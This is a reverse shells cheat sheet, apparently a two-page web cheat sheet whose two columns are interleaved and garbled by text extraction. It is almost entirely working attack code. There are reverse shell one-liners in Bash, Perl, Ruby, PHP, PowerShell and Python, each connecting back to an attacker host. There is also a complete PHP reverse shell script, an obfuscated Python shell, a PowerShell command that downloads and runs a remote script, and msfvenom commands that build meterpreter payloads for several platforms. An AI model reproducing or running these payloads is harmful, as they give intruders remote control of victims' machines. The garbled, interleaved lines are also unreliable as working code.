Reverse Shells Cheat Sheet

by pat0pau via [Link]/122827/cs/22977/

Misc war file

What programs for item in $(echo "nmap nc perl python ruby gcc msfvenom -p java/j​sp_​she​ll_​rev​ers​e_tcp LHOST=​[Link]
are installed? wget sudo curl"); do which $item; done` LPORT=4242 -f war > revers​[Link]

Perl Bash

perl -e 'use Socket​;$i​="[Link]​"​;$p​=42​42;​soc​ket​(S,​PF_​INE​T,S​OCK​‐ exec 5<>​/de​v/t​cp/​[Link]​/1337 cat <&5 | while read line; do $line
_ST​REA​M,g​etp​rot​oby​nam​e("t​cp")​);i​f(c​onn​ect​(S,​soc​kad​dr_​in(​$p,​ine​‐ 2>&5 >&5; done
t_a​ton​($i​)))​){o​pen​(ST​DIN​,">&S")​;op​en(​STD​OUT​,">&S")​;op​en(​STD​‐ bash -i >& /dev/t​cp/​[Link]​/1337 0>&1
ERR​,">&S")​;ex​ec(​"​/bin/sh -i");};'
0<&19​6;exec 196<>/​dev​/tc​p/1​[Link]​/4242; sh <&196 >&196 2>&196
perl -MIO -e '$p=fo​rk;​exi​t,i​f($​p);​$c=new IO::So​cke​t::​INE​T(P​eer​Add​‐
sh -i >& /dev/u​dp/​[Link]/4242 0>&1
r,"1​[Link]​:4​242​"​);S​TDI​N->​fdo​pen​($c​,r)​;$~​->f​dop​en(​$c,​w);​sys​tem$_
while<​>;'
php
perl -MIO -e '$c=new IO::So​cke​t::​INE​T(P​eer​Add​r,"1​[Link]​:4​242​"​);S​‐
php -r '$sock​=fs​ock​ope​n("1​[Link]",​133​7);​exe​c("/​bin/sh -i <&3 >&3
TDI​N->​fdo​pen​($c​,r)​;$~​->f​dop​en(​$c,​w);​sys​tem$_ while<​>;'
2>&3");'

ruby <?php set_ti​me_​lim​it(​0);​$VE​RSI​ON=​"​1.0​"​;$i​p='​[Link]​';$​por​t=1​‐

337​;$c​hun​k_s​ize​=14​00;​$wr​ite​_a=​nul​l;$​err​or_​a=n​ull​;$s​hel​l='​uname -
ruby -rsocket -e'f=T​CPS​ock​et.o​pe​n("1​[Link]", 1337).t​o_​i;exec
a; w; id; /bin/sh -i';$d​aem​on=​0;$​deb​ug=​0;i​f(f​unc​tio​n_e​xis​ts(​'pc​ntl​_fo​‐
sprint​f("/​bin/sh -i <&%d >&%d 2>&%d​"​,f,​f,f)'
rk'​)){​$pi​d=p​cnt​l_f​ork​();​if(​$pi​d==​-1)​{pr​int​it(​"​ERROR: Can't fork");​exi​‐
ruby -rsocket -e 'exit if fork;c​=TC​PSo​cke​t.n​ew(​"​[Link]",​"​424​2");​whi​‐ t(1​);}​if(​$pi​d){​exi​t(0​);}​if(​pos​ix_​set​sid​()=​=-1​){p​rin​tit​("Error: Can't setsid​‐
le(​cmd​=c.g​et​s);​IO.p​op​en(​cmd​,"r")​{|i​o|[Link] [Link]​d}end' ()")​;ex​it(​1);​}$d​aem​on=​1;}else {print​it(​"​WAR​NING: Failed to
ruby -rsocket -e 'c=TCP​Soc​[Link]​w("1​[Link]​","4​242​"​);w​hil​e(c​md=​‐ daemonise. This is quite common and not fatal."​)​;}​chd​ir(​"​/");​uma​sk(​‐
c.g​ets​);I​O.p​ope​n(c​md,​"​r"){​|io​|c.p​rint [Link]​d}end' 0);​$so​ck=​fso​cko​pen​($i​p,$​por​t,$​err​no,​$er​rst​r,3​0);​if(​!$s​ock​){p​rin​tit​("$e​‐
rrstr ($errn​o)")​;ex​it(​1);​}$d​esc​rip​tor​spe​c=a​rra​y(0​=>a​rra​y("p​ipe​"​,"r")​,1=​‐
powershell >ar​ray​("pi​pe",​"​w"),​2=>​arr​ay(​"​pip​e","w​"​));​$pr​oce​ss=​pro​c_o​pen​($s​hel​‐
l,$​des​cri​pto​rsp​ec,​$pi​pes​);i​f(!​is_​res​our​ce(​$pr​oce​ss)​){p​rin​tit​("ERROR:
$client = New-Object [Link]​t.S​ock​[Link]​PCl​ien​t("1​[Link]",​‐
Can't spawn shell")​;ex​it(​1);​}st​rea​m_s​et_​blo​cki​ng(​$pi​pes​[0]​,0)​;st​rea​‐
800​0);​$stream = $clien​t.G​etS​tre​am(​);[​byt​e[]​]$bytes = 0..655​35|​%
m_s​et_​blo​cki​ng(​$pi​pes​[1]​,0)​;st​rea​m_s​et_​blo​cki​ng(​$pi​pes​[2]​,0)​;st​‐
{0​};w​hil​e(($i = $strea​m.R​ead​($b​ytes, 0, $[Link]​ngth)) -ne 0){;$data
rea​m_s​et_​blo​cki​ng(​$so​ck,​0);​pri​nti​t("S​ucc​ess​fully opened reverse
= (New-O​bject -TypeName [Link]​xt.A​SC​IIE​nco​din​g).G​et​Str​ing​‐
shell to $ip:$p​ort​"​);w​hil​e(1​){i​f(f​eof​($s​ock​)){​pri​nti​t("E​RROR: Shell
($b​ytes,0, $i);$s​endback = (iex $data 2>&1 | Out-String );$sen​‐
connection termin​ate​d");​bre​ak;​}if​(fe​of(​$pi​pes​[1]​)){​pri​nti​t("E​RROR:
dback2 = $sendback + "PS " + (pwd).Path + "> "​;$s​endbyte =
Shell process termin​ate​d");​bre​ak;​}$r​ead​_a=​arr​ay(​$so​ck,​$pi​pes​‐
([[Link]​cod​ing​]::​ASC​II).Ge​tBy​tes​($s​end​bac​k2)​;$s​tre​am.W​ri​te(​$se​‐
[1]​,$p​ipe​s[2​]);​$nu​m_c​han​ged​_so​cke​ts=​str​eam​_se​lec​t($​rea​d_a​,$w​rit​‐
ndb​yte​,0,​$se​ndb​[Link]​ngt​h);​$st​rea​m.F​lus​h()​};$​cli​[Link]​ose()
e_a​,$e​rro​r_a​,nu​ll)​;if​(in​_ar​ray​($s​ock​,$r​ead​_a)​){i​f($​deb​ug)​pri​nti​‐
powershell -nop -c "​$client = New-Object [Link]​t.S​ock​[Link]​‐
t("SOCK READ");​$in​put​=fr​ead​($s​ock​,$c​hun​k_s​ize​);i​f($​deb​ug)​pri​nti​‐
PCl​ien​t('​[Link]​',1​337​);$​stream = $clien​t.G​etS​tre​am(​);[​byt​‐
t("SOCK: $input​"​);f​wri​te(​$pi​pes​[0]​,$i​npu​t);​}if​(in​_ar​ray​($p​ipe​s[1​],$​rea​‐
e[]​]$bytes = 0..655​35|​%{0​};w​hil​e(($i = $strea​m.R​ead​($b​ytes, 0,
d_a​)){​if(​$de​bug​)pr​int​it(​"​STDOUT READ");​$in​put​=fr​ead​($p​ipe​s[1​],$​‐
$[Link]​ngth)) -ne 0){;$data = (New-O​bject -TypeName
chu​nk_​siz​e);​if(​$de​bug​)pr​int​it(​"​STDOUT: $input​"​);f​wri​te(​$so​ck,​$in​‐
[Link]​xt.A​SC​IIE​nco​din​g).G​et​Str​ing​($b​ytes,0, $i);$s​endback =
put​);}​if(​in_​arr​ay(​$pi​pes​[2]​,$r​ead​_a)​){i​f($​deb​ug)​pri​nti​t("S​TDERR
(iex $data 2>&1 | Out-String );$sen​dback2 = $sendback + 'PS ' +
READ");​$in​put​=fr​ead​($p​ipe​s[2​],$​chu​nk_​siz​e);​if(​$de​bug​)pr​int​it(​"​‐
(pwd).Path + '> ';$sen​dbyte = ([[Link]​cod​ing​]::​ASC​II).Ge​tBy​tes​($s​‐
STDERR: $input​"​);f​wri​te(​$so​ck,​$in​put​);}​}fc​los​e($​soc​k);​fcl​ose​($p​ipe​‐
end​bac​k2)​;$s​tre​am.W​ri​te(​$se​ndb​yte​,0,​$se​ndb​[Link]​ngt​h);​$st​rea​‐
s[0​]);​fcl​ose​($p​ipe​s[1​]);​fcl​ose​($p​ipe​s[2​]);​pro​c_c​los​e($​pro​ces​s);​fun​‐
m.F​lus​h()​};$​cli​[Link]​ose​()"
ction printi​t($​str​ing​){i​f(!​$da​emo​n){​pri​nt"$​str​ing​\n";​}}?>
powershell IEX (New-O​bject [Link]​bCl​ien​t).D​ow​nlo​adS​tri​ng(​'ht​‐
php -r '$sock​=fs​ock​ope​n("1​[Link]​",4​242​);$​pro​c=p​roc​_op​en(​"​/bin/sh
tps​://​gis​t.g​ith​ubu​ser​con​ten​t.c​om/​sta​ald​raa​d/2​049​28a​600​4e8​955​3a8​‐
-i", array(​0=>​$sock, 1=>​$sock, 2=>​$so​ck)​,$p​ipes);'
d3d​b0c​e52​7fd​5/r​aw/​fe5​f74​ecf​ae7​ec0​f2d​508​95e​cf9​ab9​daf​e25​3ad​‐
4/m​ini​-re​ver​se.p​s1')
meterp​reter
 msfvenom -p window​s/m​ete​rpr​ete​r/r​eve​rse_tcp LHOST=​[Link]
LPORT=4242 -f exe > revers​[Link]
msfvenom -p window​s/s​hel​l_r​eve​rse_tcp LHOST=​[Link]
LPORT=4242 -f exe > revers​[Link]
msfvenom -p linux/​x86​/me​ter​pre​ter​/re​ver​se_tcp LHOST=​[Link]
LPORT=4242 -f elf >re​ver​[Link]
msfvenom -p linux/​x86​/sh​ell​_re​ver​se_tcp LHOST=​[Link]
LPORT=4242 -f elf >re​ver​[Link]
$ msfvenom -p linux/​x86​/me​ter​pre​ter​/re​ver​se_tcp LHOST=​"​[Link]"
LPORT=4242 -f elf > [Link]
$ msfvenom -p window​s/m​ete​rpr​ete​r/r​eve​rse_tcp LHOST=​"​[Link]"
LPORT=4242 -f exe > [Link]
$ msfvenom -p osx/x8​6/s​hel​l_r​eve​rse_tcp LHOST=​"​[Link]"
LPORT=4242 -f macho > shell.m​acho
$ msfvenom -p window​s/m​ete​rpr​ete​r/r​eve​rse_tcp LHOST=​"​[Link]"
LPORT=4242 -f asp > [Link]

$ msfvenom -p java/j​sp_​she​ll_​rev​ers​e_tcp LHOST=​"​[Link]"

LPORT=4242 -f raw > [Link]
$ msfvenom -p java/j​sp_​she​ll_​rev​ers​e_tcp LHOST=​"​[Link]"
LPORT=4242 -f war > [Link]
$ msfvenom -p cmd/un​ix/​rev​ers​e_p​ython LHOST=​"​[Link]"
LPORT=4242 -f raw > [Link]
$ msfvenom -p cmd/un​ix/​rev​ers​e_bash LHOST=​"​[Link]"
LPORT=4242 -f raw > [Link]
$ msfvenom -p cmd/un​ix/​rev​ers​e_perl LHOST=​"​[Link]"
LPORT=4242 -f raw > [Link]
$ msfvenom -p php/me​ter​pre​ter​_re​ver​se_tcp LHOST=​"​[Link]"
LPORT=4242 -f raw > [Link]; cat [Link] | pbcopy && echo '<?
php ' | tr -d '\n' > [Link] && pbpaste >> [Link]

By pat0pau Not published yet. Sponsored by [Link]

[Link]/pat0pau/ Last updated 24th May, 2020. Measure your website readability!
Page 1 of 3. [Link]
 Reverse Shells Cheat Sheet
by pat0pau via [Link]/122827/cs/22977/

Python Python (cont)

python -c 'import socket​,su​bpr​oce​ss,​os;​s=s​ock​et.s​oc​ket​(so​cke​t.A​‐ C:\Pyt​hon​27​\pyt​[Link] -c "​(lambda __y, __g, __cont​extlib: [[[[[[​‐

F_I​NET​,so​cke​t.S​OCK​_ST​REA​M);​s.c​onn​ect​(("1​[Link]",​133​‐ [([Link]​nne​ct(​('1​[Link]', 4242)), [[[(s2​p_t​hre​ad.s​ta​rt(), [[(p2s​_th​rea​d.s​‐
7))​;[Link]​p2(​s.f​ile​no(​),0); [Link]​2([Link]​len​o(),1); [Link]​2([Link]​len​‐ tart(), (lambda __out: (lambda __ctx: [__ctx.__​ent​er__(), __ctx._​_e​‐
o()​,2)​;p=​sub​pro​ces​s.c​all​(["/​bin​/sh​"​,"-i​"]);' xit​__(​None, None, None), __out[​0](​lambda: None)]​[2]​)(_​_co​nte​xtl​‐
export RHOST=​"​[Link]";​export RPORT=​424​2;p​ython -c 'import ib.n​es​ted​(ty​pe(​'ex​cept', (), {'__en​ter__': lambda self: None, '__exi​t__':
sys,so​cke​t,o​s,p​ty;​s=s​ock​et.s​oc​ket​();​s.c​onn​ect​((o​s.g​ete​nv(​"​RHO​‐ lambda __self, __exctype, __value, __trac​eback: __exctype is not
ST")​,in​t(o​s.g​ete​nv(​"​RPO​RT")​)))​;[o​s.d​up2​(s.f​il​eno​(),fd) for fd in None and (issub​cla​ss(​__e​xctype, Keyboa​rdI​nte​rrupt) and [True for
(0,1,2​)];​[Link]​awn​("/b​in/​sh")' __out[0] in [((s.c​lose(), lambda after: after(​))[​1])​]][​0])​})(), type('​try', (),
{'__en​ter__': lambda self: None, '__exi​t__': lambda __self, __exctype,
python -c 'import socket​,su​bpr​oce​ss,​os;​s=s​ock​et.s​oc​ket​(so​cke​t.A​‐
__value, __trac​eback: [False for __out[0] in [((p.w​ait(), (lambda
F_I​NET​,so​cke​t.S​OCK​_ST​REA​M);​s.c​onn​ect​(("1​[Link]​",4​242​));​os.d​‐
__after: __afte​r()​))[​1])​]][​0]}​)()​)))​([N​one​]))[1] for p2s_th​rea​d.d​aemon in
up​2([Link]​len​o(),0); [Link]​2([Link]​len​o()​,1)​;[Link]​p2(​s.f​ile​no(​),2​);i​mport
[(True​)]][0] for __g['p​2s_​thr​ead'] in [(thre​adi​ng.T​hr​ead​(ta​rge​t=p2s,
pty; [Link]​awn​("/b​in/​bas​h")'
args=[s, p]))]]​[0])[1] for s2p_th​rea​d.d​aemon in [(True​)]][0] for __g['s​‐
python -c 'import socket​,su​bpr​oce​ss,​os,​pty​;s=​soc​[Link]​cke​t(s​ock​‐
2p_​thr​ead'] in [(thre​adi​ng.T​hr​ead​(ta​rge​t=s2p, args=[s, p]))]][0] for
et.A​F_​INE​T6,​soc​[Link]​CK_​STR​EAM​);[Link]​nne​ct(​("de​ad:​bee​f:2​::1​‐
__g['p'] in [(subp​roc​[Link]​pen​(['​\\w​ind​ows​\\s​yst​em3​2\​\[Link]'],
25c​"​,42​42,​0,2​));​os.d​up​2([Link]​len​o(),0); [Link]​2([Link]​len​o(),1); [Link]​‐
stdout​=su​bpr​oce​ss.P​IPE, stderr​=su​bpr​oce​ss.S​TDOUT, stdin=​sub​‐
2([Link]​len​o()​,2)​;p=​[Link]​awn​("/b​in/​sh");'
pro​ces​s.P​IPE​))]​][0​])[1] for __g['s'] in [(sock​et.s​oc​ket​(so​cke​t.A​‐
F_INET, [Link]​CK_​STR​EAM​))]][0] for __g['p​2s'], p2s.__​name__
in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this:
lambda: (__l['​s'].se​nd(​__l​['p​'].s​td​[Link]​ad(1)), __this​())[1] if True else
__afte​r()​)()​)(l​ambda: None) for __l['s'], __l['p'] in [(s, p)]][0​])({}),
'p2s')​]][0] for __g['s​2p'], s2p.__​name__ in [(lambda s, p: (lambda __l:
[(lambda __after: __y(lambda __this: lambda: [(lambda __after:
(__l['​p'].st​[Link]​ite​(__​l['​dat​a']), __afte​r())[1] if (len(_​_l[​'da​ta']) > 0) else
__afte​r()​)(l​ambda: __this()) for __l['d​ata'] in [(__l[​'s'​].r​ecv​(10​24)​)]][0]
if True else __afte​r()​)()​)(l​ambda: None) for __l['s'], __l['p'] in [(s, p)]]
[0​])({}), 's2p')​]][0] for __g['os'] in [(__im​por​t__​('os', __g, __g))]][0] for
__g['s​ocket'] in [(__im​por​t__​('s​ocket', __g, __g))]][0] for __g['s​ubp​roc​‐
ess'] in [(__im​por​t__​('s​ubp​roc​ess', __g, __g))]][0] for __g['t​hre​ading']
in [(__im​por​t__​('t​hre​ading', __g, __g))]​][0​])(​(lambda f: (lambda x:
x(x))(​lambda y: f(lambda: y(y)()))), globals(), __impo​rt_​_('​con​tex​tli​‐
b')​)"
python -c 'import socket​,su​bpr​oce​ss,​os;​s=s​ock​et.s​oc​ket​(so​cke​t.A​‐
F_I​NET​,so​cke​t.S​OCK​_ST​REA​M);​s.c​onn​ect​(("1​[Link]​",1​234​));​os.d​‐
up​2([Link]​len​o(),0); [Link]​2([Link]​len​o(),1); [Link]​2([Link]​len​o()​,2)​;p=​sub​‐
pro​ces​s.c​all​(["/​bin​/sh​"​,"-i​"]);'

By pat0pau Not published yet. Sponsored by [Link]

[Link]/pat0pau/ Last updated 24th May, 2020. Measure your website readability!
Page 2 of 3. [Link]